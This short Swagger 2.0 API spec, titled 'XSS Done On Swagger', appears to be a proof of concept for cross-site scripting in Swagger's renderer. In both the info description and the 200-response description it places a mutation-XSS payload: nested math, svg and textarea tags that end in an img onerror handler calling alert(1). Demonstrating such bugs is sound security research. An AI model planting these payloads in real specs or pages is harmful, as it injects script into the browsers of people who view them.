swagger: '2.0'
info:
  title: XSS Done On Swagger
  description: <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
paths:
  /accounts:
    get:
      responses:
        '200':
          description: <math><mtext><option><FAKEFAKE><option></option><mglyph><svg><mtext><textarea><a title="</textarea><img src='#' onerror='alert(1)'>">
      tags:
        - accounts
      operationId: findAccounts
      summary: Finds all accounts
